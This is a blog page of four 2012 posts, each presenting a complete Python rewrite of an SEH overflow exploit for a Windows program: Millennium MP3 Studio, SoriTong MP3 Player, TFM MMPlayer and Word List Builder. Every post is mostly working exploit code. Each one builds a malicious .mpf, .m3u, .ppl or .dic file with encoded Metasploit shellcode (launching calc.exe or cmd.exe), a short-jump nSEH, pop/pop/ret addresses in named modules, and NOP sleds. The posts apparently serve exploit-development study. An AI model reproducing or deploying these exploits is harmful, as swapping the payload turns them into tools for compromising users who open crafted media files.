Showing posts with label seh. Show all posts
Showing posts with label seh. Show all posts

Sunday, September 2, 2012

Millennium MP3 Studio .mpf File Parsing SEH Overflow

The Millennium MP3 Studio version 1.0 is prone to a SEH overflow vulnerability. Processing specially-crafted .mpf files could trigger a SEH overwrite that could be leveraged further to gain arbitrary code execution. The exploit for this vulnerability has been documented at EDB: 9298

Here is a complete rewrite of this exploit:
from struct import *

file = "edb9298.mpf"

# msfpayload windows/exec CMD=calc.exe EXITFUNC=seh R | msfencode -b '\x00\x0a\x0d' -t perl
# [*] x86/shikata_ga_nai succeeded with size 227 (iteration=1)

calc = ("\xbb\x34\x46\x73\x3a\xda\xd2\xd9\x74\x24\xf4\x5a\x31\xc9" +
"\xb1\x33\x31\x5a\x12\x83\xea\xfc\x03\x6e\x48\x91\xcf\x72" +
"\xbc\xdc\x30\x8a\x3d\xbf\xb9\x6f\x0c\xed\xde\xe4\x3d\x21" +
"\x94\xa8\xcd\xca\xf8\x58\x45\xbe\xd4\x6f\xee\x75\x03\x5e" +
"\xef\xbb\x8b\x0c\x33\xdd\x77\x4e\x60\x3d\x49\x81\x75\x3c" +
"\x8e\xff\x76\x6c\x47\x74\x24\x81\xec\xc8\xf5\xa0\x22\x47" +
"\x45\xdb\x47\x97\x32\x51\x49\xc7\xeb\xee\x01\xff\x80\xa9" +
"\xb1\xfe\x45\xaa\x8e\x49\xe1\x19\x64\x48\x23\x50\x85\x7b" +
"\x0b\x3f\xb8\xb4\x86\x41\xfc\x72\x79\x34\xf6\x81\x04\x4f" +
"\xcd\xf8\xd2\xda\xd0\x5a\x90\x7d\x31\x5b\x75\x1b\xb2\x57" +
"\x32\x6f\x9c\x7b\xc5\xbc\x96\x87\x4e\x43\x79\x0e\x14\x60" +
"\x5d\x4b\xce\x09\xc4\x31\xa1\x36\x16\x9d\x1e\x93\x5c\x0f" +
"\x4a\xa5\x3e\x45\x8d\x27\x45\x20\x8d\x37\x46\x02\xe6\x06" +
"\xcd\xcd\x71\x97\x04\xaa\x80\x66\x95\x26\x14\xd1\x4c\x0b" +
"\x78\xe2\xba\x4f\x85\x61\x4f\x2f\x72\x79\x3a\x2a\x3e\x3d" +
"\xd6\x46\x2f\xa8\xd8\xf5\x50\xf9\xba\x98\xc2\x61\x13\x3f" +
"\x63\x03\x6b")

# 50B jump to avoid CSEH and a 4B hole @ 0012F930
# jumps directly from nseh to nop sled > shellcode
junk = "A"*4112
nseh = pack ('<I', 0x909032EB)        # short jump 50B
cseh = pack ('<I', 0x1001FFC7)        # p/p/r 1001FFC7 xaudio.dll
nops = "\x90"*80

'''
# 8B jump to avoid CSEH and land in the first NOP sled of 12B
# another 8B jump from there to avoid a 4B hole @ 0012F930 and land in the final NOP sled > shellcode
junk = "A"*4112
nseh = pack ('<I', 0x909008EB)        # short jump 8B
cseh = pack ('<I', 0x1001FFC7)        # p/p/r 1001FFC7 xaudio.dll
nops = "\x90"*12
jump = pack ('<I', 0x909008EB)        # short jump 8B
nops2 = "\x90"*40
'''

sploit = junk+nseh+cseh+nops+calc

try:
    handle = open (file, 'w')
    handle.write (sploit)
    handle.close ()
    print "[+] sploit ready: " + file + " (" + str (len (sploit)) + "B)"
except:
    print "[-] exception!"

'''
/SafeSEH Module Scanner, item 30
 SEH mode=/SafeSEH OFF
 Base=0x10000000
 Limit=0x10044000
 Module version=3, 0, 7, 0
 Module Name=xaudio.dll
'''
Posted by at 1 comment:
Labels: , , , ,

SoriTong MP3 Player .m3u File Parsing SEH Overflow

SoriTong MP3 Playerversion 1.0 is prone to a SEH overflow vulnerability. Processing specially-crafted .m3u file could trigger a SEH overwrite that could be leveraged further to gain arbitrary code execution. The exploit for this vulnerability has been documeneted at EDB: 8624

Here is a complete rewrite of this exploit:
from struct import *

file = "edb8624.m3u"

# msfpayload windows/exec CMD=calc.exe EXITFUNC=seh R | msfencode -b '\x00\x0a\x0d' -t perl
# [*] x86/shikata_ga_nai succeeded with size 227 (iteration=1)

calc = ("\xbb\x34\x46\x73\x3a\xda\xd2\xd9\x74\x24\xf4\x5a\x31\xc9" +
"\xb1\x33\x31\x5a\x12\x83\xea\xfc\x03\x6e\x48\x91\xcf\x72" +
"\xbc\xdc\x30\x8a\x3d\xbf\xb9\x6f\x0c\xed\xde\xe4\x3d\x21" +
"\x94\xa8\xcd\xca\xf8\x58\x45\xbe\xd4\x6f\xee\x75\x03\x5e" +
"\xef\xbb\x8b\x0c\x33\xdd\x77\x4e\x60\x3d\x49\x81\x75\x3c" +
"\x8e\xff\x76\x6c\x47\x74\x24\x81\xec\xc8\xf5\xa0\x22\x47" +
"\x45\xdb\x47\x97\x32\x51\x49\xc7\xeb\xee\x01\xff\x80\xa9" +
"\xb1\xfe\x45\xaa\x8e\x49\xe1\x19\x64\x48\x23\x50\x85\x7b" +
"\x0b\x3f\xb8\xb4\x86\x41\xfc\x72\x79\x34\xf6\x81\x04\x4f" +
"\xcd\xf8\xd2\xda\xd0\x5a\x90\x7d\x31\x5b\x75\x1b\xb2\x57" +
"\x32\x6f\x9c\x7b\xc5\xbc\x96\x87\x4e\x43\x79\x0e\x14\x60" +
"\x5d\x4b\xce\x09\xc4\x31\xa1\x36\x16\x9d\x1e\x93\x5c\x0f" +
"\x4a\xa5\x3e\x45\x8d\x27\x45\x20\x8d\x37\x46\x02\xe6\x06" +
"\xcd\xcd\x71\x97\x04\xaa\x80\x66\x95\x26\x14\xd1\x4c\x0b" +
"\x78\xe2\xba\x4f\x85\x61\x4f\x2f\x72\x79\x3a\x2a\x3e\x3d" +
"\xd6\x46\x2f\xa8\xd8\xf5\x50\xf9\xba\x98\xc2\x61\x13\x3f" +
"\x63\x03\x6b")

junk = "\xCC"*260
nseh = pack ('<I', 0x909032EB)         # short jump 50B
cseh = pack ('<I', 0x1001CFDA)         # p/p/r 1001CFDA Player.dll
nops = "\x90"*80

sploit = junk+nseh+cseh+nops+calc

try:
    handle = open (file, 'w')
    handle.write (sploit)
    handle.close ()
    print "[+] sploit ready: " + file + " (" + str (len (sploit)) + "B)"
except:
    print "[-] exception!"

'''
/SafeSEH Module Scanner, item 33
 SEH mode=/SafeSEH OFF
 Base=0x10000000
 Limit=0x10094000
 Module Name=Player.dll
'''
Posted by at No comments:
Labels: , , , ,

TFM MMPlayer .ppl File Parsing SEH Overflow

The TFM MMPlayer version 2.0 has a SEH overflow vulnerability. Processing specially-crafted .ppl file triggers SEH overwrite that could be leveraged further to gain arbitrary code execution. The exploit for this vulnerability has been documeneted at EDB: 19176

Here is a complete rewrite of this exploit:
from struct import *

 file = "edb19176.ppl"

 # msfpayload windows/exec CMD=cmd.exe R | msfencode -b '\x00\x0a\x0d' -t perl
# [*] x86/shikata_ga_nai succeeded with size 226 (iteration=1)

 cmmd = ("\xda\xd5\xb8\x4f\xc1\x95\xae\xd9\x74\x24\xf4\x5a\x29\xc9" +
"\xb1\x32\x83\xc2\x04\x31\x42\x16\x03\x42\x16\xe2\xba\x3d" +
"\x7d\x27\x44\xbe\x7e\x58\xcd\x5b\x4f\x4a\xa9\x28\xe2\x5a" +
"\xba\x7d\x0f\x10\xee\x95\x84\x54\x26\x99\x2d\xd2\x10\x94" +
"\xae\xd2\x9c\x7a\x6c\x74\x60\x81\xa1\x56\x59\x4a\xb4\x97" +
"\x9e\xb7\x37\xc5\x77\xb3\xea\xfa\xfc\x81\x36\xfa\xd2\x8d" +
"\x07\x84\x57\x51\xf3\x3e\x56\x82\xac\x35\x10\x3a\xc6\x12" +
"\x80\x3b\x0b\x41\xfc\x72\x20\xb2\x77\x85\xe0\x8a\x78\xb7" +
"\xcc\x41\x47\x77\xc1\x98\x80\xb0\x3a\xef\xfa\xc2\xc7\xe8" +
"\x39\xb8\x13\x7c\xdf\x1a\xd7\x26\x3b\x9a\x34\xb0\xc8\x90" +
"\xf1\xb6\x96\xb4\x04\x1a\xad\xc1\x8d\x9d\x61\x40\xd5\xb9" +
"\xa5\x08\x8d\xa0\xfc\xf4\x60\xdc\x1e\x50\xdc\x78\x55\x73" +
"\x09\xfa\x34\x1e\xcc\x8e\x43\x67\xce\x90\x4b\xc8\xa7\xa1" +
"\xc0\x87\xb0\x3d\x03\xec\x4f\x74\x09\x45\xd8\xd1\xd8\xd7" +
"\x85\xe1\x37\x1b\xb0\x61\xbd\xe4\x47\x79\xb4\xe1\x0c\x3d" +
"\x25\x98\x1d\xa8\x49\x0f\x1d\xf9\x2a\xc2\x85\x2c\xc9\x64" +
"\x23\x31")

 nop1 = "\x90"*3777
nop2 = "\x90"*100
jmp2 = "\xE9\xA8\xFD\xFF\xFF"             # near jump (back) 600B (0xFFFFFDA8)
nseh = pack ('<I', 0x9090C4EB)            # short jump (back) 60B (0xFFC4)
cseh = pack ('<I', 0x00401390)            # p/p/r 00401390 MMPlayer.exe

 sploit = nop1+cmmd+nop2+jmp2+nseh+cseh
#        3777 226  100  5    4    4

 try:
    handle = open (file, 'w')
    handle.write (sploit)
    handle.close ()
    print "[+] sploit ready: " + file + " (" + str (len (sploit)) + "B)"
except:
    print "[-] exception!"

 '''
/SafeSEH Module Scanner, item 18
 SEH mode=/SafeSEH OFF
 Base=0x400000
 Limit=0x47c000
 Module version=2.2.0.30
 Module Name=MMPlayer.exe
'''
Posted by at No comments:
Labels: , , , , ,

Word List Builder .dic File Parsing SEH Overflow

The Word List Builder version 1.0 has a SEH overflow vulnerability. Processing specially-crafted .dic dictionary files triggers a SEH overwrite that could be leveraged further to gain arbitrary code execution. The exploit for this vulnerability has been documented at EDB: 17086

Here is a complete rewrite of this exploit:
from struct import *

 file = "edb17086.dic"

 # msfpayload windows/exec CMD=cmd.exe R | msfencode -b '\x00\x0a\x0d' -t perl
# [*] x86/shikata_ga_nai succeeded with size 226 (iteration=1)

 cmmd = ("\xda\xd5\xb8\x4f\xc1\x95\xae\xd9\x74\x24\xf4\x5a\x29\xc9" +
"\xb1\x32\x83\xc2\x04\x31\x42\x16\x03\x42\x16\xe2\xba\x3d" +
"\x7d\x27\x44\xbe\x7e\x58\xcd\x5b\x4f\x4a\xa9\x28\xe2\x5a" +
"\xba\x7d\x0f\x10\xee\x95\x84\x54\x26\x99\x2d\xd2\x10\x94" +
"\xae\xd2\x9c\x7a\x6c\x74\x60\x81\xa1\x56\x59\x4a\xb4\x97" +
"\x9e\xb7\x37\xc5\x77\xb3\xea\xfa\xfc\x81\x36\xfa\xd2\x8d" +
"\x07\x84\x57\x51\xf3\x3e\x56\x82\xac\x35\x10\x3a\xc6\x12" +
"\x80\x3b\x0b\x41\xfc\x72\x20\xb2\x77\x85\xe0\x8a\x78\xb7" +
"\xcc\x41\x47\x77\xc1\x98\x80\xb0\x3a\xef\xfa\xc2\xc7\xe8" +
"\x39\xb8\x13\x7c\xdf\x1a\xd7\x26\x3b\x9a\x34\xb0\xc8\x90" +
"\xf1\xb6\x96\xb4\x04\x1a\xad\xc1\x8d\x9d\x61\x40\xd5\xb9" +
"\xa5\x08\x8d\xa0\xfc\xf4\x60\xdc\x1e\x50\xdc\x78\x55\x73" +
"\x09\xfa\x34\x1e\xcc\x8e\x43\x67\xce\x90\x4b\xc8\xa7\xa1" +
"\xc0\x87\xb0\x3d\x03\xec\x4f\x74\x09\x45\xd8\xd1\xd8\xd7" +
"\x85\xe1\x37\x1b\xb0\x61\xbd\xe4\x47\x79\xb4\xe1\x0c\x3d" +
"\x25\x98\x1d\xa8\x49\x0f\x1d\xf9\x2a\xc2\x85\x2c\xc9\x64" +
"\x23\x31")

 nop1 = "\x90"*3777
nop2 = "\x90"*100
jmp2 = "\xE9\xA8\xFD\xFF\xFF"         # near jump (back) 600B (0xFFFFFDA8)
nseh = pack ('<I', 0x90909CEB)        # short jump (back) 100B (0xFF9C)
cseh = pack ('<I', 0x0040143C)        # p/p/r 0040143C Word_Builder.exe

 sploit = nop1+cmmd+nop2+jmp2+nseh+cseh
#        3777 226  100  5    4    4

 try:
    handle = open (file, 'w')
    handle.write (sploit)
    handle.close ()
    print "[+] sploit ready: " + file + " (" + str (len (sploit)) + "B)"
except:
    print "[-] exception!"

Posted by at No comments:
Labels: , , , , ,
Subscribe to: Posts (Atom)